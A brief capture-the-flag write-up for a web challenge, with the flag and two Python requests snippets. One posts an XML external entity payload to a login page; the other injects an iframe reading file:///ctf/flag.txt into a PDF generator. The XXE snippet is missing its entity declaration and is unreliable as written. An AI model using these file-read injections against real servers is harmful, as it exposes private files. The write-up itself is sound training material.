**web/include me**
flag is in /ctf/flag.txt
flag: `EHACON{lf1_@nd_xx3_1s_fun}`

```
d = """ ]><root><email>&xx;;</email><password>lol</password></root>"""
requests.post("http://chall.ctf-ehcon.ml:32104/login.php", data=d).text
```

to get flag.php
from flag.php you can send POST req to flag.php
use html iframe attack

```
requests.post("http://chall.ctf-ehcon.ml:32104/flag.php", data={"content": "<html><head></head><body><iframe src='file:///ctf/flag.txt'></iframe></body></html>"})
```

then go to http://chall.ctf-ehcon.ml:32104/files/result.pdf